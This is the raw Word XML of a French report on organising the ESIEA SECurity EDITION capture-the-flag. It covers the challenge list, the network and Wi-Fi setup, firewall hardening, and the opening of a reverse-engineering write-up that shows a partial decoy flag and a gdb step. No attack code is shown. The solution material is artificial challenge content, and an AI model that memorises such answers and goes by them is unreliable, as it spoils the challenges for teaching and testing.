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numbering.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.numbering+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sdt>
      <w:sdtPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:id w:val="414904541"/>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-332105</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>123190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6500495" cy="4876165"/>
                <wp:effectExtent l="0" t="0" r="5080" b="635"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="11" name="Picture 11" descr="IMG_20160521_113132_ ze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IMG_20160521_113132_ zenk"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId10"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6500495" cy="4876165"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p>
          <w:pPr>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:posOffset>683895</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:posOffset>6637020</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="6400800" cy="2724150"/>
                    <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
                    <wp:wrapNone/>
                    <wp:docPr id="6" name="Zone de texte 6" descr="Title, Subtitle, and Abstract"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr txBox="1"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="6400800" cy="2724150"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln w="6350">
                              <a:noFill/>
                            </a:ln>
                            <a:effectLst/>
                          </wps:spPr>
                          <wps:txbx>
                            <w:txbxContent>
                              <w:p>
                                <w:pPr>
                                  <w:pStyle w:val="77"/>
                                  <w:rPr>
                                    <w:lang w:val="fr-FR"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:sdt>
                                  <w:sdtPr>
                                    <w:rPr>
                                      <w:lang w:val="fr-FR"/>
                                    </w:rPr>
                                    <w:alias w:val="Titre"/>
                                    <w:id w:val="1790474242"/>
                                    <w:placeholder>
                                      <w:docPart w:val="A8272018F39E4CD9A03F40C2F29788F4"/>
                                    </w:placeholder>
                                    <w:text w:multiLine="1"/>
                                  </w:sdtPr>
                                  <w:sdtEndPr>
                                    <w:rPr>
                                      <w:lang w:val="fr-FR"/>
                                    </w:rPr>
                                  </w:sdtEndPr>
                                  <w:sdtContent>
                                    <w:r>
                                      <w:t xml:space="preserve">ESIEA SECurity EDITION </w:t>
                                    </w:r>
                                    <w:r>
                                      <w:br w:type="textWrapping"/>
                                    </w:r>
                                    <w:r>
                                      <w:t>Capture the Flags</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p>
                                <w:pPr>
                                  <w:ind w:left="450"/>
                                </w:pPr>
                                <w:r>
                                  <w:t>DE REYDELLET Romain                                                                                                                         Suiveurs</w:t>
                                </w:r>
                              </w:p>
                              <w:p>
                                <w:pPr>
                                  <w:ind w:left="450"/>
                                </w:pPr>
                                <w:r>
                                  <w:t>PEIRO Valentin                                                                                                                                         GROS Damien</w:t>
                                </w:r>
                              </w:p>
                              <w:p>
                                <w:pPr>
                                  <w:ind w:left="450"/>
                                </w:pPr>
                                <w:r>
                                  <w:t>ROPELEWSKI Maxime                                                                                                                           GUYOT Vincent</w:t>
                                </w:r>
                              </w:p>
                              <w:p>
                                <w:pPr>
                                  <w:ind w:left="450"/>
                                </w:pPr>
                              </w:p>
                              <w:sdt>
                                <w:sdtPr>
                                  <w:rPr>
                                    <w:lang w:val="fr-FR"/>
                                  </w:rPr>
                                  <w:alias w:val="Sommaire"/>
                                  <w:tag w:val="Sommaire"/>
                                  <w:id w:val="1812897548"/>
                                  <w:placeholder>
                                    <w:docPart w:val="7DA331C4651141A79F4D5AF832ABD05C"/>
                                  </w:placeholder>
                                  <w:showingPlcHdr/>
                                  <w:text/>
                                </w:sdtPr>
                                <w:sdtEndPr>
                                  <w:rPr>
                                    <w:lang w:val="fr-FR"/>
                                  </w:rPr>
                                </w:sdtEndPr>
                                <w:sdtContent>
                                  <w:p>
                                    <w:pPr>
                                      <w:ind w:left="450"/>
                                      <w:rPr>
                                        <w:lang w:val="fr-FR"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:lang w:val="fr-FR"/>
                                      </w:rPr>
                                      <w:t>[</w:t>
                                    </w:r>
                                    <w:r>
                                      <w:rPr>
                                        <w:i/>
                                        <w:iCs/>
                                        <w:color w:val="808080" w:themeColor="text1" w:themeTint="80"/>
                                        <w:sz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wps:txbx>
                          <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
                            <a:noAutofit/>
                          </wps:bodyPr>
                        </wps:wsp>
                      </a:graphicData>
                    </a:graphic>
                    <wp14:sizeRelH relativeFrom="page">
                      <wp14:pctWidth>82500</wp14:pctWidth>
                    </wp14:sizeRelH>
                    <wp14:sizeRelV relativeFrom="page">
                      <wp14:pctHeight>27200</wp14:pctHeight>
                    </wp14:sizeRelV>
                  </wp:anchor>
                </w:drawing>
              </mc:Choice>
              <mc:Fallback>
                <w:pict>
                  <v:shape id="Zone de texte 6" o:spid="_x0000_s1026" o:spt="202" alt="Title, Subtitle, and Abstract" type="#_x0000_t202" style="position:absolute;left:0pt;margin-left:53.85pt;margin-top:522.6pt;height:214.5pt;width:504pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:251662336;v-text-anchor:bottom;mso-width-relative:page;mso-height-relative:page;mso-width-percent:825;mso-height-percent:272;" filled="f" stroked="f" coordsize="21600,21600" o:allowoverlap="f" o:gfxdata="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dgfTM9sAAAAOAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQA&#10;FAAAAAgAh07iQFnaDbcoAgAAQQQAAA4AAAAAAAAAAQAgAAAAKgEAAGRycy9lMm9Eb2MueG1sUEsF&#10;BgAAAAAGAAYAWQEAAMQFAAAAAA==&#10;">
                    <v:fill on="f" focussize="0,0"/>
                    <v:stroke on="f" weight="0.5pt"/>
                    <v:imagedata o:title=""/>
                    <o:lock v:ext="edit" aspectratio="f"/>
                    <v:textbox inset="0mm,0mm,0mm,0mm">
                      <w:txbxContent>
                        <w:p>
                          <w:pPr>
                            <w:pStyle w:val="77"/>
                            <w:rPr>
                              <w:lang w:val="fr-FR"/>
                            </w:rPr>
                          </w:pPr>
                          <w:sdt>
                            <w:sdtPr>
                              <w:rPr>
                                <w:lang w:val="fr-FR"/>
                              </w:rPr>
                              <w:alias w:val="Titre"/>
                              <w:id w:val="1790474242"/>
                              <w:placeholder>
                                <w:docPart w:val="A8272018F39E4CD9A03F40C2F29788F4"/>
                              </w:placeholder>
                              <w:text w:multiLine="1"/>
                            </w:sdtPr>
                            <w:sdtEndPr>
                              <w:rPr>
                                <w:lang w:val="fr-FR"/>
                              </w:rPr>
                            </w:sdtEndPr>
                            <w:sdtContent>
                              <w:r>
                                <w:t xml:space="preserve">ESIEA SECurity EDITION </w:t>
                              </w:r>
                              <w:r>
                                <w:br w:type="textWrapping"/>
                              </w:r>
                              <w:r>
                                <w:t>Capture the Flags</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p>
                          <w:pPr>
                            <w:ind w:left="450"/>
                          </w:pPr>
                          <w:r>
                            <w:t>DE REYDELLET Romain                                                                                                                         Suiveurs</w:t>
                          </w:r>
                        </w:p>
                        <w:p>
                          <w:pPr>
                            <w:ind w:left="450"/>
                          </w:pPr>
                          <w:r>
                            <w:t>PEIRO Valentin                                                                                                                                         GROS Damien</w:t>
                          </w:r>
                        </w:p>
                        <w:p>
                          <w:pPr>
                            <w:ind w:left="450"/>
                          </w:pPr>
                          <w:r>
                            <w:t>ROPELEWSKI Maxime                                                                                                                           GUYOT Vincent</w:t>
                          </w:r>
                        </w:p>
                        <w:p>
                          <w:pPr>
                            <w:ind w:left="450"/>
                          </w:pPr>
                        </w:p>
                        <w:sdt>
                          <w:sdtPr>
                            <w:rPr>
                              <w:lang w:val="fr-FR"/>
                            </w:rPr>
                            <w:alias w:val="Sommaire"/>
                            <w:tag w:val="Sommaire"/>
                            <w:id w:val="1812897548"/>
                            <w:placeholder>
                              <w:docPart w:val="7DA331C4651141A79F4D5AF832ABD05C"/>
                            </w:placeholder>
                            <w:showingPlcHdr/>
                            <w:text/>
                          </w:sdtPr>
                          <w:sdtEndPr>
                            <w:rPr>
                              <w:lang w:val="fr-FR"/>
                            </w:rPr>
                          </w:sdtEndPr>
                          <w:sdtContent>
                            <w:p>
                              <w:pPr>
                                <w:ind w:left="450"/>
                                <w:rPr>
                                  <w:lang w:val="fr-FR"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:lang w:val="fr-FR"/>
                                </w:rPr>
                                <w:t>[</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:i/>
                                  <w:iCs/>
                                  <w:color w:val="808080" w:themeColor="text1" w:themeTint="80"/>
                                  <w:sz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v:textbox>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="fr-FR"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>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lang w:val="fr-FR"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorAscii"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:instrText xml:space="preserve">TOC \o "1-3" \t "" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorAscii"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>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_Toc727876620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Introduction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_Toc727876620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_Toc1531753053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Interface et mode de fonctionnement</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_Toc1531753053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_Toc255796371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Présentation de l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="577188"/>
          <w:kern w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>’interface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_Toc255796371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_Toc2036896015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Configuration du Wifi et des machines</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_Toc2036896015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_Toc629246561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Mise en place de la sécurité</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_Toc629246561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_Toc1129475827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Reverse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_Toc1129475827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_Toc515733889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50 - ELF 50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_Toc515733889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_Toc630980451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50 - ELF 50 Bis</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_Toc630980451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_Toc1179904586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100 - ELF 100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_Toc1179904586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_Toc1417630314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150 - ELF 150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_Toc1417630314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_Toc1335023265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REVERSE 350 - THE GAME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_Toc1335023265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11</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_Toc1332550964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Crypto</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_Toc1332550964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_Toc719675004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50 - Crypto Troll</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_Toc719675004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_Toc99050113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50 - Simple xor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_Toc99050113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_Toc208074189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100 - Euclide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_Toc208074189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_Toc654825164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100 - Chain reaction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_Toc654825164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_Toc1951900500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150 - Weird cipher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_Toc1951900500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_Toc1516111964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200 - Romain Small Arithmetic</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_Toc1516111964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_Toc1055286697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250 - Magic Crypto Language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_Toc1055286697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_Toc824802714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300 - Broken Algorithm</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_Toc824802714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_Toc1837497389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Web App</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_Toc1837497389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_Toc1920998107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50 - Much Serie Very Analyse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_Toc1920998107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_Toc975256513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50 - FlagShop</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_Toc975256513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_Toc1636488011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100 - Super Query Login v2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_Toc1636488011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_Toc259757843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100 - Starbug Bounty</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_Toc259757843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_Toc575153864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100 - Super Query Login v1</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_Toc575153864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_Toc1000827590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WEB 150 - La route est longue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_Toc1000827590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_Toc532990925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200 - Glob Secret Manager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_Toc532990925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_Toc287671175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250 - My personnal website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_Toc287671175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_Toc1945293522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Misc</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_Toc1945293522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_Toc1260867545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50 - LOLCODE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_Toc1260867545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_Toc1819424229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50 - DIGICODE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_Toc1819424229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_Toc977839926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100 - PDF</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_Toc977839926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_Toc1516663917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150 - Wow stegano</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_Toc1516663917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_Toc1708836596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250 - Outsmarter filter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_Toc1708836596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_Toc1607086487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300 - Stolen Data</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_Toc1607086487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_Toc498656096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400 - Escalade Me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_Toc498656096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_Toc77086838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Résultat du CTF</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_Toc77086838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_Toc90583291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BLA</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_Toc90583291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_Toc1678560682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Points de vue personnel</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_Toc1678560682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_Toc1494717152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DE REYDELLET Romain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_Toc1494717152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_Toc1425606556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PEIRO Valentin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_Toc1425606556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_Toc863627998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ROPELEWSKI Maxime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_Toc863627998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_Toc66908509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Conclusion et remerciements</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_Toc66908509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rPr>
          <w:lang w:val="fr-FR"/>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rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId4" w:type="first"/>
          <w:footerReference r:id="rId6" w:type="first"/>
          <w:headerReference r:id="rId3" w:type="default"/>
          <w:footerReference r:id="rId5" w:type="default"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal" w:start="1"/>
          <w:cols w:space="720" w:num="1"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc727876620"/>
      <w:bookmarkStart w:id="1" w:name="_Toc1628291547"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Notre projet consistait à organiser un Capture The Flag de type jeopardy où les participants doivent résoudre des épreuves seul ou en équipe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le CTF s’est déroulé de 9h30 à 18h15 avec la remise des lots à 18h30 où l’on a récompensé les 8 premières équipes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Nous avons proposé au total 30 challenges répartis en catégorie: Web, Cryptographie, Reverse Engineering et Misc qui regroupe les autres challenges inclassables (réseau, forensic, Web&amp;Crypto, ...).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>La gestion des équipes et des challenges s’est faite sur une interface web développée pour l’occasion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Les challengers étaient divisés sur 2 salles (V02 et V04) où des PC étaient mis à disposition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc1794270041"/>
      <w:bookmarkStart w:id="3" w:name="_Toc1531753053"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Interface et mode de fonctionnement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1066800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>53975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3867150" cy="3168015"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="8" name="Picture 8" descr="network_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network_screen"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="2026920" y="2142490"/>
                      <a:ext cx="3867150" cy="3168015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc255796371"/>
      <w:bookmarkStart w:id="5" w:name="_Toc1359596991"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>Présentation de l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>’interface</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Afin assurer le bon fonctionnement du CTF, les participants se connectaient à l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’ interface web et ainsi créer un équipe, voir la liste des challenges, les valider et voir le classement des équipes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Nous avons aussi développé un chat où les challengers pouvaient discuter entre eux et nous reporter d’éventuels problèmes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc1254655609"/>
      <w:bookmarkStart w:id="7" w:name="_Toc2036896015"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>Configuration du Wifi et des machines</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le nombre de place étant limité et afin de faciliter l’accès au CTF, nous déployé le WIFI à l’aide de Mr Gros. Nous avons placé une borne WIFI dans la baie de la salle V02 et l’avons configurée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Nous avons voulu proposer aux personnes sans machines de pouvoir participer au concours. Pour cela, nous avons déployé un Kali Linux sur toutes les machines des deux salles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Nous avons aussi déployé un serveur DHCP sur le serveur pour attribuer une adresse ip à chaque machine pour qu’elles puissent communiquer entre elles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc629246561"/>
      <w:bookmarkStart w:id="9" w:name="_Toc1365199255"/>
      <w:r>
        <w:t>Mise en place de la sécurité</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Pour éviter que quelqu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’un n’usurpe l’adresse ip du panel, nous avons ajouté une option dans le panel d’administration des routeurs en renseignant l’adresse MAC de la machine Panel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le panel étant l’espace le plus critique (validation des flags), nous avons chiffré les flux HTTP avec SSL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Nous avons aussi établi des règles firewall avec iptables bloquant toutes les requêtes entrantes et sortantes sur les ports différents de 80 et 443.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>De même pour le serveur hébergeant les challenges, uniquement le port 80 est ouvert et est non bloqué.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId7" w:type="default"/>
          <w:footerReference r:id="rId8" w:type="default"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc234903711"/>
      <w:bookmarkStart w:id="11" w:name="_Toc1129475827"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Challenges et résolutions des épreuves</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Reverse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc515733889"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>REVERSE 50 - ELF 50</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On est face à un binaire 64 bits non strippé, on va le décompiler avec gdb. Avant de debugger on va tout de même tester un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">strings </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sur le binaire. On obtient un début de flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>“ese{whatH_is_the_Hreal_flaH” mais il ne valide pas.</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i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>gdb-peda$ disassemble main</w:t>
